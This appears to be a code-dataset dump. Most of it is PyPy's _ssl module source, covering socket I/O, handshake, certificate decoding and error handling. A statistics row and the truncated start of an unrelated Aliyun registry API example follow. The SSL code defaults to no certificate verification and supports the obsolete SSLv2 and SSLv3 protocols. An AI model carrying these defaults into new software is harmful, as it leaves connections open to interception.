        # Wait until the socket is writable (or fail on timeout/close).
        sockstate = check_socket_and_wait_for_timeout(self.space,
            self.w_socket, True)
        if sockstate == SOCKET_HAS_TIMED_OUT:
            raise ssl_error(self.space, "The write operation timed out")
        elif sockstate == SOCKET_HAS_BEEN_CLOSED:
            raise ssl_error(self.space, "Underlying socket has been closed.")
        elif sockstate == SOCKET_TOO_LARGE_FOR_SELECT:
            raise ssl_error(self.space, "Underlying socket too large for select().")

        num_bytes = 0
        while True:
            err = 0

            num_bytes = libssl_SSL_write(self.ssl, data, len(data))
            err = libssl_SSL_get_error(self.ssl, num_bytes)

            # WANT_READ/WANT_WRITE: OpenSSL needs the socket ready in the
            # indicated direction before the write can be retried.
            if err == SSL_ERROR_WANT_READ:
                sockstate = check_socket_and_wait_for_timeout(self.space,
                    self.w_socket, False)
            elif err == SSL_ERROR_WANT_WRITE:
                sockstate = check_socket_and_wait_for_timeout(self.space,
                    self.w_socket, True)
            else:
                sockstate = SOCKET_OPERATION_OK

            if sockstate == SOCKET_HAS_TIMED_OUT:
                raise ssl_error(self.space, "The write operation timed out")
            elif sockstate == SOCKET_HAS_BEEN_CLOSED:
                raise ssl_error(self.space, "Underlying socket has been closed.")
            elif sockstate == SOCKET_IS_NONBLOCKING:
                break

            if err == SSL_ERROR_WANT_READ or err == SSL_ERROR_WANT_WRITE:
                continue
            else:
                break

        if num_bytes > 0:
            return self.space.wrap(num_bytes)
        else:
            raise _ssl_seterror(self.space, self, num_bytes)

    def pending(self):
        """pending() -> count

        Returns the number of already decrypted bytes available for read,
        pending on the connection."""
        count = libssl_SSL_pending(self.ssl)
        if count < 0:
            raise _ssl_seterror(self.space, self, count)
        return self.space.wrap(count)

    @unwrap_spec(num_bytes=int)
    def read(self, num_bytes=1024):
        """read([len]) -> string

        Read up to len bytes from the SSL socket."""
        # If no decrypted bytes are buffered, wait for the socket first.
        count = libssl_SSL_pending(self.ssl)
        if not count:
            sockstate = check_socket_and_wait_for_timeout(self.space,
                self.w_socket, False)
            if sockstate == SOCKET_HAS_TIMED_OUT:
                raise ssl_error(self.space, "The read operation timed out")
            elif sockstate == SOCKET_TOO_LARGE_FOR_SELECT:
                raise ssl_error(self.space, "Underlying socket too large for select().")
            elif sockstate == SOCKET_HAS_BEEN_CLOSED:
                # A clean SSL shutdown from the peer means EOF.
                if libssl_SSL_get_shutdown(self.ssl) == SSL_RECEIVED_SHUTDOWN:
                    return self.space.wrap('')
                raise ssl_error(self.space, "Socket closed without SSL shutdown handshake")

        raw_buf, gc_buf = rffi.alloc_buffer(num_bytes)
        while True:
            err = 0

            count = libssl_SSL_read(self.ssl, raw_buf, num_bytes)
            err = libssl_SSL_get_error(self.ssl, count)

            if err == SSL_ERROR_WANT_READ:
                sockstate = check_socket_and_wait_for_timeout(self.space,
                    self.w_socket, False)
            elif err == SSL_ERROR_WANT_WRITE:
                sockstate = check_socket_and_wait_for_timeout(self.space,
                    self.w_socket, True)
            elif (err == SSL_ERROR_ZERO_RETURN and
                  libssl_SSL_get_shutdown(self.ssl) == SSL_RECEIVED_SHUTDOWN):
                # Peer performed a clean shutdown: report EOF.
                return self.space.wrap("")
            else:
                sockstate = SOCKET_OPERATION_OK

            if sockstate == SOCKET_HAS_TIMED_OUT:
                raise ssl_error(self.space, "The read operation timed out")
            elif sockstate == SOCKET_IS_NONBLOCKING:
                break

            if err == SSL_ERROR_WANT_READ or err == SSL_ERROR_WANT_WRITE:
                continue
            else:
                break

        if count <= 0:
            raise _ssl_seterror(self.space, self, count)

        result = rffi.str_from_buffer(raw_buf, gc_buf, num_bytes, count)
        rffi.keep_buffer_alive_until_here(raw_buf, gc_buf)
        return self.space.wrap(result)

    def _refresh_nonblocking(self, space):
        # just in case the blocking state of the socket has been changed
        w_timeout = space.call_method(self.w_socket, "gettimeout")
        nonblocking = not space.is_w(w_timeout, space.w_None)
        libssl_BIO_set_nbio(libssl_SSL_get_rbio(self.ssl), nonblocking)
        libssl_BIO_set_nbio(libssl_SSL_get_wbio(self.ssl), nonblocking)

    def do_handshake(self, space):
        """Perform the SSL handshake, then cache the peer certificate and
        the one-line subject/issuer renderings."""
        self._refresh_nonblocking(space)

        # Actually negotiate SSL connection
        # XXX If SSL_do_handshake() returns 0, it's also a failure.
        while True:
            ret = libssl_SSL_do_handshake(self.ssl)
            err = libssl_SSL_get_error(self.ssl, ret)
            # XXX PyErr_CheckSignals()
            if err == SSL_ERROR_WANT_READ:
                sockstate = check_socket_and_wait_for_timeout(
                    space, self.w_socket, False)
            elif err == SSL_ERROR_WANT_WRITE:
                sockstate = check_socket_and_wait_for_timeout(
                    space, self.w_socket, True)
            else:
                sockstate = SOCKET_OPERATION_OK
            if sockstate == SOCKET_HAS_TIMED_OUT:
                raise ssl_error(space, "The handshake operation timed out")
            elif sockstate == SOCKET_HAS_BEEN_CLOSED:
                raise ssl_error(space, "Underlying socket has been closed.")
            elif sockstate == SOCKET_TOO_LARGE_FOR_SELECT:
                raise ssl_error(space, "Underlying socket too large for select().")
            elif sockstate == SOCKET_IS_NONBLOCKING:
                break

            if err == SSL_ERROR_WANT_READ or err == SSL_ERROR_WANT_WRITE:
                continue
            else:
                break

        if ret <= 0:
            raise _ssl_seterror(space, self, ret)

        if self.peer_cert:
            libssl_X509_free(self.peer_cert)
        self.peer_cert = libssl_SSL_get_peer_certificate(self.ssl)
        if self.peer_cert:
            libssl_X509_NAME_oneline(
                libssl_X509_get_subject_name(self.peer_cert),
                self._server, X509_NAME_MAXLEN)
            libssl_X509_NAME_oneline(
                libssl_X509_get_issuer_name(self.peer_cert),
                self._issuer, X509_NAME_MAXLEN)

    def shutdown(self, space):
        """Shut the SSL connection down and return the underlying socket."""
        # Guard against closed socket
        w_fileno = space.call_method(self.w_socket, "fileno")
        if space.int_w(w_fileno) < 0:
            raise ssl_error(space, "Underlying socket has been closed")

        self._refresh_nonblocking(space)

        zeros = 0

        while True:
            # Disable read-ahead so that unwrap can work correctly.
            # Otherwise OpenSSL might read in too much data,
            # eating clear text data that happens to be
            # transmitted after the SSL shutdown.
            # Should be safe to call repeatedly everytime this
            # function is used and the shutdown_seen_zero != 0
            # condition is met.
            if self.shutdown_seen_zero:
                libssl_SSL_set_read_ahead(self.ssl, 0)
            ret = libssl_SSL_shutdown(self.ssl)

            # if err == 1, a secure shutdown with SSL_shutdown() is complete
            if ret > 0:
                break
            if ret == 0:
                # Don't loop endlessly; instead preserve legacy
                # behaviour of trying SSL_shutdown() only twice.
                # This looks necessary for OpenSSL < 0.9.8m
                zeros += 1
                if zeros > 1:
                    break
                # Shutdown was sent, now try receiving
                self.shutdown_seen_zero = True
                continue

            # Possibly retry shutdown until timeout or failure
            ssl_err = libssl_SSL_get_error(self.ssl, ret)
            if ssl_err == SSL_ERROR_WANT_READ:
                sockstate = check_socket_and_wait_for_timeout(
                    self.space, self.w_socket, False)
            elif ssl_err == SSL_ERROR_WANT_WRITE:
                sockstate = check_socket_and_wait_for_timeout(
                    self.space, self.w_socket, True)
            else:
                break

            if sockstate == SOCKET_HAS_TIMED_OUT:
                if ssl_err == SSL_ERROR_WANT_READ:
                    raise ssl_error(self.space, "The read operation timed out")
                else:
                    raise ssl_error(self.space, "The write operation timed out")
            elif sockstate == SOCKET_TOO_LARGE_FOR_SELECT:
                raise ssl_error(space, "Underlying socket too large for select().")
            elif sockstate != SOCKET_OPERATION_OK:
                # Retain the SSL error code
                break

        if ret < 0:
            raise _ssl_seterror(space, self, ret)

        return self.w_socket

    def cipher(self, space):
        """Return (cipher_name, protocol_version, secret_bits) or None."""
        if not self.ssl:
            return space.w_None
        current = libssl_SSL_get_current_cipher(self.ssl)
        if not current:
            return space.w_None

        name = libssl_SSL_CIPHER_get_name(current)
        if name:
            w_name = space.wrap(rffi.charp2str(name))
        else:
            w_name = space.w_None

        proto = libssl_SSL_CIPHER_get_version(current)
        if proto:
            # BUGFIX: previously wrapped 'name' here, so the protocol slot
            # of the tuple repeated the cipher name; use 'proto' instead.
            w_proto = space.wrap(rffi.charp2str(proto))
        else:
            w_proto = space.w_None

        bits = libssl_SSL_CIPHER_get_bits(current,
                                          lltype.nullptr(rffi.INTP.TO))
        w_bits = space.newint(bits)

        return space.newtuple([w_name, w_proto, w_bits])

    @unwrap_spec(der=bool)
    def peer_certificate(self, der=False):
        """peer_certificate([der=False]) -> certificate

        Returns the certificate for the peer. If no certificate was provided,
        returns None. If a certificate was provided, but not validated, returns
        an empty dictionary. Otherwise returns a dict containing information
        about the peer certificate.

        If the optional argument is True, returns a DER-encoded copy of the
        peer certificate, or None if no certificate was provided. This will
        return the certificate even if it wasn't validated."""
        if not self.peer_cert:
            return self.space.w_None

        if der:
            # return cert in DER-encoded format
            with lltype.scoped_alloc(rffi.CCHARPP.TO, 1) as buf_ptr:
                buf_ptr[0] = lltype.nullptr(rffi.CCHARP.TO)
                length = libssl_i2d_X509(self.peer_cert, buf_ptr)
                if length < 0:
                    raise _ssl_seterror(self.space, self, length)
                try:
                    # this is actually an immutable bytes sequence
                    return self.space.wrap(rffi.charpsize2str(buf_ptr[0],
                                                              length))
                finally:
                    # i2d_X509 allocated the buffer; OpenSSL must free it.
                    libssl_OPENSSL_free(buf_ptr[0])
        else:
            verification = libssl_SSL_CTX_get_verify_mode(
                libssl_SSL_get_SSL_CTX(self.ssl))
            if not verification & SSL_VERIFY_PEER:
                # Certificate was not validated: return an empty dict.
                return self.space.newdict()
            else:
                return _decode_certificate(self.space, self.peer_cert)
def _decode_certificate(space, certificate, verbose=False):
    """Decode an X509 certificate into an app-level dict.

    Always includes "subject", "notAfter" and (via _get_peer_alt_names)
    "subjectAltName"; with verbose=True also "issuer", "version",
    "serialNumber" and "notBefore".
    """
    w_retval = space.newdict()

    w_peer = _create_tuple_for_X509_NAME(
        space, libssl_X509_get_subject_name(certificate))
    space.setitem(w_retval, space.wrap("subject"), w_peer)

    if verbose:
        w_issuer = _create_tuple_for_X509_NAME(
            space, libssl_X509_get_issuer_name(certificate))
        space.setitem(w_retval, space.wrap("issuer"), w_issuer)

        space.setitem(w_retval, space.wrap("version"),
                      space.wrap(libssl_X509_get_version(certificate)))

    # A memory BIO is used to render the binary fields as text.
    biobuf = libssl_BIO_new(libssl_BIO_s_mem())
    try:
        if verbose:
            libssl_BIO_reset(biobuf)
            serialNumber = libssl_X509_get_serialNumber(certificate)
            libssl_i2a_ASN1_INTEGER(biobuf, serialNumber)
            # should not exceed 20 octets, 160 bits, so buf is big enough
            with lltype.scoped_alloc(rffi.CCHARP.TO, 100) as buf:
                length = libssl_BIO_gets(biobuf, buf, 99)
                if length < 0:
                    raise _ssl_seterror(space, None, length)
                w_serial = space.wrap(rffi.charpsize2str(buf, length))
            space.setitem(w_retval, space.wrap("serialNumber"), w_serial)

            libssl_BIO_reset(biobuf)
            notBefore = libssl_X509_get_notBefore(certificate)
            libssl_ASN1_TIME_print(biobuf, notBefore)
            with lltype.scoped_alloc(rffi.CCHARP.TO, 100) as buf:
                length = libssl_BIO_gets(biobuf, buf, 99)
                if length < 0:
                    raise _ssl_seterror(space, None, length)
                w_date = space.wrap(rffi.charpsize2str(buf, length))
            space.setitem(w_retval, space.wrap("notBefore"), w_date)

        libssl_BIO_reset(biobuf)
        notAfter = libssl_X509_get_notAfter(certificate)
        libssl_ASN1_TIME_print(biobuf, notAfter)
        with lltype.scoped_alloc(rffi.CCHARP.TO, 100) as buf:
            length = libssl_BIO_gets(biobuf, buf, 99)
            if length < 0:
                raise _ssl_seterror(space, None, length)
            w_date = space.wrap(rffi.charpsize2str(buf, length))
        space.setitem(w_retval, space.wrap("notAfter"), w_date)
    finally:
        # The BIO must be freed on every path.
        libssl_BIO_free(biobuf)

    # Now look for subjectAltName
    w_alt_names = _get_peer_alt_names(space, certificate)
    if w_alt_names is not space.w_None:
        space.setitem(w_retval, space.wrap("subjectAltName"), w_alt_names)

    return w_retval
def _create_tuple_for_X509_NAME(space, xname):
    """Convert an X509_NAME into a wrapped tuple of RDNs.

    Each RDN (relative distinguished name) is itself a tuple of
    (attribute-name, value) pairs; consecutive entries sharing the same
    'set' index belong to the same RDN.
    """
    entry_count = libssl_X509_NAME_entry_count(xname)
    dn_w = []
    rdn_w = []
    rdn_level = -1
    for index in range(entry_count):
        entry = libssl_X509_NAME_get_entry(xname, index)
        # check to see if we've gotten to a new RDN
        entry_level = intmask(entry[0].c_set)
        if rdn_level >= 0:
            if rdn_level != entry_level:
                # yes, new RDN
                # add old RDN to DN
                dn_w.append(space.newtuple(list(rdn_w)))
                rdn_w = []
        rdn_level = entry_level

        # Now add this attribute to the current RDN
        name = libssl_X509_NAME_ENTRY_get_object(entry)
        value = libssl_X509_NAME_ENTRY_get_data(entry)
        attr = _create_tuple_for_attribute(space, name, value)
        rdn_w.append(attr)

    # Now, there is typically a dangling RDN
    if rdn_w:
        dn_w.append(space.newtuple(list(rdn_w)))
    return space.newtuple(list(dn_w))
def _get_peer_alt_names(space, certificate):
    """Extract the subjectAltName entries of a certificate as a wrapped
    tuple of (type, value) pairs, or space.w_None when absent."""
    # this code follows the procedure outlined in
    # OpenSSL's crypto/x509v3/v3_prn.c:X509v3_EXT_print()
    # function to extract the STACK_OF(GENERAL_NAME),
    # then iterates through the stack to add the
    # names.
    if not certificate:
        return space.w_None

    # get a memory buffer
    biobuf = libssl_BIO_new(libssl_BIO_s_mem())
    try:
        alt_names_w = []
        i = 0
        while True:
            # Find the next subjectAltName extension, starting after
            # the previous hit.
            i = libssl_X509_get_ext_by_NID(
                certificate, NID_subject_alt_name, i)
            if i < 0:
                break

            # now decode the altName
            ext = libssl_X509_get_ext(certificate, i)
            method = libssl_X509V3_EXT_get(ext)
            if not method:
                raise ssl_error(space,
                                "No method for internalizing subjectAltName!'")

            with lltype.scoped_alloc(rffi.CCHARPP.TO, 1) as p_ptr:
                p_ptr[0] = ext[0].c_value.c_data
                length = intmask(ext[0].c_value.c_length)
                null = lltype.nullptr(rffi.VOIDP.TO)
                # Use the ASN1 item template when the method provides
                # one, otherwise fall back to its d2i callback.
                if method[0].c_it:
                    names = rffi.cast(GENERAL_NAMES, libssl_ASN1_item_d2i(
                        null, p_ptr, length,
                        libssl_ASN1_ITEM_ptr(method[0].c_it)))
                else:
                    names = rffi.cast(GENERAL_NAMES, method[0].c_d2i(
                        null, p_ptr, length))

            for j in range(libssl_sk_GENERAL_NAME_num(names)):
                # Get a rendering of each name in the set of names

                name = libssl_sk_GENERAL_NAME_value(names, j)
                if intmask(name[0].c_type) == GEN_DIRNAME:
                    # we special-case DirName as a tuple of tuples of attributes
                    dirname = libssl_pypy_GENERAL_NAME_dirn(name)
                    w_t = space.newtuple([
                        space.wrap("DirName"),
                        _create_tuple_for_X509_NAME(space, dirname)
                        ])
                else:
                    # for everything else, we use the OpenSSL print form
                    libssl_BIO_reset(biobuf)
                    libssl_GENERAL_NAME_print(biobuf, name)
                    with lltype.scoped_alloc(rffi.CCHARP.TO, 2048) as buf:
                        length = libssl_BIO_gets(biobuf, buf, 2047)
                        if length < 0:
                            raise _ssl_seterror(space, None, 0)
                        v = rffi.charpsize2str(buf, length)
                    # GENERAL_NAME_print emits "type:value"; split once.
                    v1, v2 = v.split(':', 1)
                    w_t = space.newtuple([space.wrap(v1),
                                          space.wrap(v2)])

                alt_names_w.append(w_t)
    finally:
        libssl_BIO_free(biobuf)

    if alt_names_w:
        return space.newtuple(list(alt_names_w))
    else:
        return space.w_None
def _create_tuple_for_attribute(space, name, value):
    """Build a wrapped (attribute-name, unicode-value) pair from an
    ASN1_OBJECT name and an ASN1_STRING value."""
    # Render the ASN1_OBJECT name into a text buffer.
    with lltype.scoped_alloc(rffi.CCHARP.TO, X509_NAME_MAXLEN) as buf:
        length = libssl_OBJ_obj2txt(buf, X509_NAME_MAXLEN, name, 0)
        if length < 0:
            raise _ssl_seterror(space, None, 0)
        w_name = space.wrap(rffi.charpsize2str(buf, length))

    # NOTE(review): ASN1_STRING_to_UTF8 allocates buf_ptr[0] itself; the
    # visible code never OPENSSL_free()s it — possible leak, confirm.
    with lltype.scoped_alloc(rffi.CCHARPP.TO, 1) as buf_ptr:
        length = libssl_ASN1_STRING_to_UTF8(buf_ptr, value)
        if length < 0:
            raise _ssl_seterror(space, None, 0)
        w_value = space.wrap(rffi.charpsize2str(buf_ptr[0], length))
        w_value = space.call_method(w_value, "decode", space.wrap("utf-8"))

    return space.newtuple([w_name, w_value])
# App-level type definition: exposes the interp-level SSLObject methods
# to application code under the "SSLObject" type name.
SSLObject.typedef = TypeDef("SSLObject",
    server = interp2app(SSLObject.server),
    issuer = interp2app(SSLObject.issuer),
    write = interp2app(SSLObject.write),
    pending = interp2app(SSLObject.pending),
    read = interp2app(SSLObject.read),
    do_handshake = interp2app(SSLObject.do_handshake),
    shutdown = interp2app(SSLObject.shutdown),
    cipher = interp2app(SSLObject.cipher),
    peer_certificate = interp2app(SSLObject.peer_certificate),
)
def new_sslobject(space, w_sock, side, w_key_file, w_cert_file,
                  cert_mode, protocol, w_cacerts_file, w_ciphers):
    """Create and configure an SSLObject wrapping w_sock.

    side is PY_SSL_CLIENT or PY_SSL_SERVER; cert_mode is one of the
    PY_SSL_CERT_* constants; protocol selects a PY_SSL_VERSION_* method.
    Each of the w_key_file/w_cert_file/w_cacerts_file/w_ciphers arguments
    may be app-level None.

    Raises the app-level SSL error for invalid combinations or any
    OpenSSL setup failure.
    """
    ss = SSLObject(space)

    sock_fd = space.int_w(space.call_method(w_sock, "fileno"))
    w_timeout = space.call_method(w_sock, "gettimeout")
    if space.is_w(w_timeout, space.w_None):
        has_timeout = False
    else:
        has_timeout = True
    # Unwrap the optional string arguments (app-level None -> None).
    if space.is_w(w_key_file, space.w_None):
        key_file = None
    else:
        key_file = space.str_w(w_key_file)
    if space.is_w(w_cert_file, space.w_None):
        cert_file = None
    else:
        cert_file = space.str_w(w_cert_file)
    if space.is_w(w_cacerts_file, space.w_None):
        cacerts_file = None
    else:
        cacerts_file = space.str_w(w_cacerts_file)
    if space.is_w(w_ciphers, space.w_None):
        ciphers = None
    else:
        ciphers = space.str_w(w_ciphers)

    if side == PY_SSL_SERVER and (not key_file or not cert_file):
        raise ssl_error(space, "Both the key & certificate files "
                        "must be specified for server-side operation")

    # set up context
    if protocol == PY_SSL_VERSION_TLS1:
        method = libssl_TLSv1_method()
    elif protocol == PY_SSL_VERSION_SSL3:
        method = libssl_SSLv3_method()
    elif protocol == PY_SSL_VERSION_SSL2 and not OPENSSL_NO_SSL2:
        method = libssl_SSLv2_method()
    elif protocol == PY_SSL_VERSION_SSL23:
        method = libssl_SSLv23_method()
    else:
        raise ssl_error(space, "Invalid SSL protocol variant specified")

    ss.ctx = libssl_SSL_CTX_new(method)
    if not ss.ctx:
        raise ssl_error(space, "Could not create SSL context")

    if ciphers:
        ret = libssl_SSL_CTX_set_cipher_list(ss.ctx, ciphers)
        if ret == 0:
            raise ssl_error(space, "No cipher can be selected.")

    if cert_mode != PY_SSL_CERT_NONE:
        # Verification requires a CA file to verify against.
        if not cacerts_file:
            raise ssl_error(space,
                            "No root certificates specified for "
                            "verification of other-side certificates.")
        ret = libssl_SSL_CTX_load_verify_locations(ss.ctx, cacerts_file, None)
        if ret != 1:
            raise _ssl_seterror(space, None, 0)

    if key_file:
        ret = libssl_SSL_CTX_use_PrivateKey_file(ss.ctx, key_file,
                                                 SSL_FILETYPE_PEM)
        if ret < 1:
            raise ssl_error(space, "SSL_CTX_use_PrivateKey_file error")

        ret = libssl_SSL_CTX_use_certificate_chain_file(ss.ctx, cert_file)
        if ret < 1:
            raise ssl_error(space, "SSL_CTX_use_certificate_chain_file error")

    # ssl compatibility
    libssl_SSL_CTX_set_options(ss.ctx,
                               SSL_OP_ALL & ~SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS)

    verification_mode = SSL_VERIFY_NONE
    if cert_mode == PY_SSL_CERT_OPTIONAL:
        verification_mode = SSL_VERIFY_PEER
    elif cert_mode == PY_SSL_CERT_REQUIRED:
        verification_mode = SSL_VERIFY_PEER | SSL_VERIFY_FAIL_IF_NO_PEER_CERT
    libssl_SSL_CTX_set_verify(ss.ctx, verification_mode, None)

    ss.ssl = libssl_SSL_new(ss.ctx)  # new ssl struct
    libssl_SSL_set_fd(ss.ssl, sock_fd)  # set the socket for SSL
    libssl_SSL_set_mode(ss.ssl, SSL_MODE_AUTO_RETRY)

    # If the socket is in non-blocking mode or timeout mode, set the BIO
    # to non-blocking mode (blocking is the default)
    if has_timeout:
        # Set both the read and write BIO's to non-blocking mode
        libssl_BIO_set_nbio(libssl_SSL_get_rbio(ss.ssl), 1)
        libssl_BIO_set_nbio(libssl_SSL_get_wbio(ss.ssl), 1)

    # BUGFIX: a stray unconditional SSL_set_connect_state() call used to
    # precede this if/else; the handshake role is fully determined by the
    # single call below (the later call overrides the earlier one), so the
    # redundant call was dropped.
    if side == PY_SSL_CLIENT:
        libssl_SSL_set_connect_state(ss.ssl)
    else:
        libssl_SSL_set_accept_state(ss.ssl)

    ss.w_socket = w_sock
    return ss
def check_socket_and_wait_for_timeout(space, w_sock, writing):
    """If the socket has a timeout, do a select()/poll() on the socket.
    The argument writing indicates the direction.
    Returns one of the possibilities in the timeout_state enum (above)."""
    w_timeout = space.call_method(w_sock, "gettimeout")
    if space.is_w(w_timeout, space.w_None):
        return SOCKET_IS_BLOCKING
    timeout = space.float_w(w_timeout)
    if timeout == 0.0:
        return SOCKET_IS_NONBLOCKING
    fd = space.int_w(space.call_method(w_sock, "fileno"))
    # A negative fd means the socket has already been closed
    if fd < 0:
        return SOCKET_HAS_BEEN_CLOSED
    # See whether the socket is ready.  poll() is preferred when
    # available because it works for any fd, unlike select().
    if HAVE_RPOLL:
        if writing:
            event = rpoll.POLLOUT
        else:
            event = rpoll.POLLIN
        # poll() takes milliseconds; the socket timeout is in seconds
        ms = int(timeout * 1000 + 0.5)
        ready = rpoll.poll({fd: event}, ms)
    else:
        # select() cannot handle arbitrarily large descriptors
        if MAX_FD_SIZE is not None and fd >= MAX_FD_SIZE:
            return SOCKET_TOO_LARGE_FOR_SELECT
        if writing:
            rlist, wlist, elist = rpoll.select([], [fd], [], timeout)
            ready = wlist
        else:
            rlist, wlist, elist = rpoll.select([fd], [], [], timeout)
            ready = rlist
    if ready:
        return SOCKET_OPERATION_OK
    return SOCKET_HAS_TIMED_OUT
def _ssl_seterror(space, ss, ret):
    """Build an ssl_error describing the SSL call that returned *ret*.

    Maps the OpenSSL error code to a PY_SSL_ERROR_* constant plus a
    readable message; BIO-level I/O errors are converted to socket
    exceptions instead.
    """
    assert ret <= 0
    if ss and ss.ssl:
        err = libssl_SSL_get_error(ss.ssl, ret)
    else:
        err = SSL_ERROR_SSL
    msg = ""
    code = 0
    if err == SSL_ERROR_ZERO_RETURN:
        msg = "TLS/SSL connection has been closed"
        code = PY_SSL_ERROR_ZERO_RETURN
    elif err == SSL_ERROR_WANT_READ:
        msg = "The operation did not complete (read)"
        code = PY_SSL_ERROR_WANT_READ
    elif err == SSL_ERROR_WANT_WRITE:
        msg = "The operation did not complete (write)"
        code = PY_SSL_ERROR_WANT_WRITE
    elif err == SSL_ERROR_WANT_X509_LOOKUP:
        msg = "The operation did not complete (X509 lookup)"
        code = PY_SSL_ERROR_WANT_X509_LOOKUP
    elif err == SSL_ERROR_WANT_CONNECT:
        msg = "The operation did not complete (connect)"
        code = PY_SSL_ERROR_WANT_CONNECT
    elif err == SSL_ERROR_SYSCALL:
        queued = libssl_ERR_get_error()
        if queued == 0:
            if ret == 0 or space.is_w(ss.w_socket, space.w_None):
                msg = "EOF occurred in violation of protocol"
                code = PY_SSL_ERROR_EOF
            elif ret == -1:
                # the underlying BIO reported an I/O error
                error = rsocket.last_error()
                return interp_socket.converted_error(space, error)
            else:
                msg = "Some I/O error occurred"
                code = PY_SSL_ERROR_SYSCALL
        else:
            msg = rffi.charp2str(libssl_ERR_error_string(queued, None))
            code = PY_SSL_ERROR_SYSCALL
    elif err == SSL_ERROR_SSL:
        queued = libssl_ERR_get_error()
        code = PY_SSL_ERROR_SSL
        if queued != 0:
            msg = rffi.charp2str(libssl_ERR_error_string(queued, None))
        else:
            msg = "A failure in the SSL library occurred"
    else:
        msg = "Invalid error code"
        code = PY_SSL_ERROR_INVALID_ERROR_CODE
    return ssl_error(space, msg, code)
@unwrap_spec(side=int, cert_mode=int, protocol=int)
def sslwrap(space, w_socket, side, w_key_file=None, w_cert_file=None,
            cert_mode=PY_SSL_CERT_NONE, protocol=PY_SSL_VERSION_SSL23,
            w_cacerts_file=None, w_ciphers=None):
    """sslwrap(socket, side, [keyfile, certfile]) -> sslobject"""
    # Build the interp-level SSL object, then hand it back wrapped
    new_obj = new_sslobject(space, w_socket, side, w_key_file, w_cert_file,
                            cert_mode, protocol, w_cacerts_file, w_ciphers)
    return space.wrap(new_obj)
class Cache:
    """Per-space cache holding the _ssl.SSLError exception class."""

    def __init__(self, space):
        # SSLError subclasses the socket module's error class
        w_base = interp_socket.get_error(space, "error")
        self.w_error = space.new_exception_class(
            "_ssl.SSLError", w_base)
def get_error(space):
    """Return the (cached) _ssl.SSLError exception class for this space."""
    cache = space.fromcache(Cache)
    return cache.w_error
@unwrap_spec(filename=str, verbose=bool)
def _test_decode_cert(space, filename, verbose=True):
    """Read a PEM-encoded certificate from *filename* and return it
    decoded via _decode_certificate()."""
    bio = libssl_BIO_new(libssl_BIO_s_file())
    if not bio:
        raise ssl_error(space, "Can't malloc memory to read file")
    try:
        if libssl_BIO_read_filename(bio, filename) <= 0:
            raise ssl_error(space, "Can't open file")
        certificate = libssl_PEM_read_bio_X509_AUX(bio, None, None, None)
        if not certificate:
            raise ssl_error(space, "Error decoding PEM-encoded file")
        try:
            return _decode_certificate(space, certificate, verbose)
        finally:
            # free the X509 even if decoding raises
            libssl_X509_free(certificate)
    finally:
        # always release the BIO
        libssl_BIO_free(bio)
# this function is needed to perform locking on shared data
# structures. (Note that OpenSSL uses a number of global data
# structures that will be implicitly shared whenever multiple threads
# use OpenSSL.) Multi-threaded applications will crash at random if
# it is not set.
#
# locking_function() must be able to handle up to CRYPTO_num_locks()
# different mutex locks. It sets the n-th lock if mode & CRYPTO_LOCK, and
# releases it otherwise.
#
# filename and line are the file number of the function setting the
# lock. They can be useful for debugging.
_ssl_locks = []
def _ssl_thread_locking_function(mode, n, filename, line):
    """OpenSSL locking callback: take lock *n* if mode & CRYPTO_LOCK,
    release it otherwise.  Out-of-range indices are ignored."""
    index = intmask(n)
    if index < 0 or index >= len(_ssl_locks):
        return
    lock = _ssl_locks[index]
    if intmask(mode) & CRYPTO_LOCK:
        lock.acquire(True)
    else:
        lock.release()
def _ssl_thread_id_function():
    """OpenSSL thread-id callback: return the calling thread's ident."""
    from pypy.module.thread import ll_thread
    ident = ll_thread.get_ident()
    return rffi.cast(rffi.LONG, ident)
def setup_ssl_threads():
    """Allocate one lock per OpenSSL mutex slot and install the locking
    and thread-id callbacks OpenSSL needs for multi-threaded use."""
    from pypy.module.thread import ll_thread
    total = libssl_CRYPTO_num_locks()
    for _ in range(total):
        _ssl_locks.append(ll_thread.allocate_lock())
    libssl_CRYPTO_set_locking_callback(_ssl_thread_locking_function)
    libssl_CRYPTO_set_id_callback(_ssl_thread_id_function)
| 38.132898 | 91 | 0.631777 | 4,649 | 35,006 | 4.454721 | 0.126049 | 0.036311 | 0.02028 | 0.013761 | 0.392033 | 0.327813 | 0.267986 | 0.234573 | 0.207967 | 0.187639 | 0 | 0.014511 | 0.289322 | 35,006 | 917 | 92 | 38.174482 | 0.817952 | 0.12275 | 0 | 0.314074 | 0 | 0 | 0.062288 | 0.005917 | 0 | 0 | 0 | 0 | 0.002963 | 1 | 0.045926 | false | 0 | 0.017778 | 0.004444 | 0.122963 | 0.004444 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ea007a2b53efa3763616ae1425044471321276f | 983 | py | Python | python/aliApi/containerRegistry/main.py | GordonChen13/learn-examples | d04ba39edc7fcc5a5f546ba72764df6ce2f9ee2b | [
"MIT"
] | 2 | 2018-05-14T02:16:36.000Z | 2019-07-15T03:16:02.000Z | python/aliApi/containerRegistry/main.py | GordonChen13/learn-examples | d04ba39edc7fcc5a5f546ba72764df6ce2f9ee2b | [
"MIT"
] | 1 | 2018-04-08T09:32:53.000Z | 2018-04-10T08:14:31.000Z | python/aliApi/containerRegistry/main.py | GordonChen13/learn-examples | d04ba39edc7fcc5a5f546ba72764df6ce2f9ee2b | [
"MIT"
] | 2 | 2017-11-27T05:34:34.000Z | 2018-09-25T05:06:53.000Z | #!/usr/bin/env python
# coding=utf-8
from aliyunsdkcore.acs_exception.exceptions import ClientException
from aliyunsdkcore.acs_exception.exceptions import ServerException
from aliyunsdkcore.client import AcsClient
# from aliyunsdkcr.request.v20160607 import GetImageLayerRequest
from aliyunsdkcr.request.v20160607 import GetRepoTagsRequest
# 示例执行异常时建议升级aliyun-python-sdk-core到最新版本
# 设置Client
apiClient = AcsClient('your access key id', 'your access key secret', 'cn-shenzhen')
# 构造请求
# request = GetImageLayerRequest.GetImageLayerRequest()
request = GetRepoTagsRequest.GetRepoTagsRequest()
# 设置参数
request.set_RepoNamespace("namespace")
request.set_RepoName("repo name")
# request.set_Tag("tag")
# 根据文档获取资源所在区域对应的RegionId
# 请求地址格式为cr.{regionId}.aliyuncs.com
request.set_endpoint("cr.cn-shenzhen.aliyuncs.com")
# 发起请求
try:
